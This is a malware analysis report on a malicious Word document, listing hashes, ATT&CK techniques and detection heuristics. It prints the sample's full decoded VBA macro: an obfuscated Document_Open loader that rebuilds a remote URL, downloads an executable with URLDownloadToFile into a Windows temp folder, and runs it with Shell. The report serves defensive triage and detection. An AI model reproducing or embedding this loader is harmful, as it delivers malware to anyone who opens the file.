Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 162ee1723919e3af…

Verdict: MALICIOUS

File type: Office (OOXML)

Size: 176.4 KB
Created: 2019-05-28 12:16:00 UTC
Authoring application: Microsoft Office Word 12.0000
First seen: 2019-08-04
MD5: 96e482c25a00cd6f2e02b74a54f9d711
SHA-1: ff946f957c4b59d742c7b2875ac713e6b6922870
SHA-256: 162ee1723919e3afe7ca5d8c8a0c204b46aca0d2e8226d80af095bd9228f7d1e
Risk score: 212

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File
  • T1105 Ingress Tool Transfer

The sample is a malicious OOXML document containing a VBA macro. The macro is obfuscated and uses a Document_Open auto-execution technique. It leverages the URLDownloadToFile function, indicating an intent to download and execute a second-stage payload from a remote source. The ClamAV detection further confirms its malicious nature.

Heuristics (7)

  • ClamAV: Doc.Dropper.Agent-6995980-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6995980-0
  • VBA project inside OOXML [medium, 3 related findings] OOXML_VBA
    Document contains a VBA project — VBA macros present
  • URLDownloadToFile in VBA [critical] OLE_VBA_DOWNLOAD
    The VBA project declares and calls the urlmon URLDownloadToFile API, which fetches a remote resource to a local file.
    Matched lines in script:
    #If VBA7 Then
    Private Declare PtrSafe Function URLDownloadToFile Lib "urlmon" _
            Alias "URLDownloadToFileA" (ByVal pCaller As Long, _
  • Obfuscated auto-exec VBA loader [critical] OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched lines in script:
    avntSV40 = -5973
    Interaction.Shell@ Replace(a28IaQT(1), "GHHx", "")
    Dim agtTW As Long
  • Document_Open macro [low] OLE_VBA_DOCOPEN
    The VBA project defines a Document_Open handler, which runs automatically when the document is opened.
    Matched lines in script:
    Attribute VB_Customizable = True
    Sub Document_Open()
    Dim aMhg6O As Integer
  • Suspicious extracted artifact [info] EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://schemas.openxmlformats.org/markup-compatibility/2006 (referenced by macro)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships (referenced by macro)
    • http://schemas.openxmlformats.org/officeDocument/2006/math (referenced by macro)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing (referenced by macro)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main (referenced by macro)
    • http://schemas.microsoft.com/office/word/2006/wordml (referenced by macro)

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
Size: 5193 bytes
SHA-256: b5a11704c1e30a19ee2ad923f35b166469ed60afd3581b561c346a5290957a97
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Document_Open()
Dim aMhg6O As Integer
aMhg6O = -32086
' Critically snarl decade capitol except
Dim ajb16XoR9 As Long
ajb16XoR9 = -8022
' Department becoming antique privateer inferno motif
Dim a7gj0 As Boolean
a7gj0 = True
' Clog harm bracelets
Dim a8jWRuI As Integer
a8jWRuI = -14292
' Tapers questionable postponement
'
Dim abNBot As Boolean
abNBot = False
' Regrettable reflects oakland voiceless
Dim a9bQInm1f As Boolean
a9bQInm1f = True
' Figured
Dim aQjfn593 As Integer
aQjfn593 = -11609
' Centered
Dim atJkWGBm As Boolean
atJkWGBm = False
' Corinth
Dim aXv6fl42 As Boolean
aXv6fl42 = False
' Petiole dates therefore adverb alignment
main
End Sub

Attribute VB_Name = "arm9O"
Function a28IaQT(aGhOMJ As Long) As String
Dim aVDNWps2j As Boolean
aVDNWps2j = False
' Uncomfortably veterinary
Dim azbCc6 As String
azbCc6 = "apL8MF"
' Progenitor coop seems
Dim alcfk As Boolean
alcfk = True
a8P5EVkjy = Array("vyoHEigvyoHEipvyoHEijvyoHEi.vyoHEi1vyoHEi0vyoHEi1vyoHEi/vyoHEiuvyoHEiivyoHEihvyoHEi/vyoHEi6vyoHEi0vyoHEi/vyoHEi9vyoHEi1vyoHEi0vyoHEi2vyoHEi/vyoHEisvyoHEidvyoHEiavyoHEiovyoHEilvyoHEipvyoHEiuvyoHEi/vyoHEitvyoHEinvyoHEievyoHEitvyoHEinvyoHEiovyoHEicvyoHEi-vyoHEipvyoHEiwvyoHEi/vyoHEievyoHEivvyoHEi.vyoHEimvyoHEiovyoHEicvyoHEi.vyoHEiavyoHEigvyoHEiivyoHEilvyoHEiuvyoHEijvyoHEi/vyoHEi/vyoHEi:vyoHEisvyoHEipvyoHEitvyoHEitvyoHEihvyoHEi", "xHHGfxHHGdxHHGpxHHG.xHHG4xHHG8xHHG9xHHG\xHHGpxHHGmxHHGexHHGTxHHG\xHHGsxHHGwxHHGoxHHGdxHHGnxHHGixHHGWxHHG\xHHG:xHHGCxHHG")
Dim aQfqs0 As Long
aQfqs0 = 20113
Dim aVABHZL As Long
aVABHZL = 6395
' Storing
Dim akGyJUiab As Boolean
akGyJUiab = True
' Stan ec britney
Dim a7SdUKD As Boolean
a7SdUKD = False
a28IaQT = StrReverse(a8P5EVkjy(aGhOMJ))
End Function

Attribute VB_Name = "a54Nf63"
#If VBA7 Then
Private Declare PtrSafe Function URLDownloadToFile Lib "urlmon" _
        Alias "URLDownloadToFileA" (ByVal pCaller As Long, _
                                    ByVal szURL As String, ByVal szFileName As String, _
                                    ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
#Else
Private Declare Function URLDownloadToFile Lib "urlmon" _
        Alias "URLDownloadToFileA" (ByVal pCaller As Long, _
                                    ByVal szURL As String, ByVal szFileName As String, _
                                    ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
#End If
Public Function aNIoyaRfB(a8K5n, aokvCR)

Dim aVhgwz As String
aVhgwz = "aHvSo"
Dim aGDXK7ywE As String
aGDXK7ywE = "arHck"
Dim alpDF As String
alpDF = "aUrdeH"
' Thieving trimmings incoherent coop
URLDownloadToFile 0, a8K5n, aokvCR, 0, 0
End Function

Attribute VB_Name = "aHoGW"
Sub main()
Dim a9N4UbvHj As Integer
a9N4UbvHj = -8122
' Grants truck simpson tankard genres crack
Dim aNmYdCVB As Long
aNmYdCVB = 20762
Dim akU1qnftK As Boolean
akU1qnftK = True
' Goblin malacca true descriptions
Dim adzmxTUw As String
adzmxTUw = "aVUEZb"
' Sources dose asia rides undivided aluminium
aNIoyaRfB Replace(a28IaQT(0), "iEHoyv", ""), Replace(a28IaQT(1), "GHHx", "")
Dim akf6gF As Boolean
akf6gF = True
' Permissions shop
Dim a90ge As Integer
a90ge = 27296
Dim aHJK5hkCq As Long
aHJK5hkCq = 9208
Dim avntSV40 As Long
avntSV40 = -5973
Interaction.Shell@ Replace(a28IaQT(1), "GHHx", "")
Dim agtTW As Long
agtTW = -7489
' Viewpicture
Dim aGrBFQ As Boolean
aGrBFQ = True
' Rockies diesel
Dim ackpex As Boolean
ackpex = False
Dim a6jPaByIn As Long
a6jPaByIn = -23473
' Palmer ann


Dim a19gHm As String
a19gHm = "aN9US"
' Zealously carnation withering synthetic argument overhead
Dim au8ZJz1Yf As Long
au8ZJz1Yf = -20349
' Quality brewed

Dim a8t6FrCnA As String
a8t6FrCnA = "abdCBr8"
Dim anegZd5fL As Long
anegZd5fL = -12652
' Corporeal quotes baghdad spar phoenicia
Dim a0APHR As String
a0APHR = "avhnGV2O"
' Russet carb condemning
End Sub

Attribute VB_Name = "aneD80Aq"
Attribute VB_Base = "0{C10CB51D-7882-47F0-9133-B9188CF65993}{5701C2EF-B767-4789-8228-80B4D07825AA}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub UserForm_Initialize()
Dim awAXGR5I0 As Boolean
awAXGR5I0 = True
' Bicycle teas loon upload verbs adventuress meets
Dim azhuxO As Long
azhuxO = -3223
' Tumultuously sandwich fields stats communism

Dim aXAgEtb As String
aXAgEtb = "aAQfK7tI"
' Casey tannin finite
Dim aRuDBeGU3 As Boolean
aRuDBeGU3 = True
' Strategic porter pirates
Dim aFpnJ As Integer
aFpnJ = 27270
' Baboon dead boris
Dim aSUPnYEHi As String
aSUPnYEHi = "aUuDx"
' Analyst fawning sphinx facetiously oral palm
End Sub
Public Sub test()
Dim aDeL3xWX As Boolean
aDeL3xWX = False
' Chance
Dim aynN1mXG As Long
aynN1mXG = -21769
End Sub

Filename: vbaProject_00.bin
Kind: vba-project
Source: OOXML VBA project: word/vbaProject.bin
Size: 34304 bytes
SHA-256: 71163b19dcd04b3c246a26cb72753ea00d906f91d9a88b21b2f4ccabc60f2a41
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).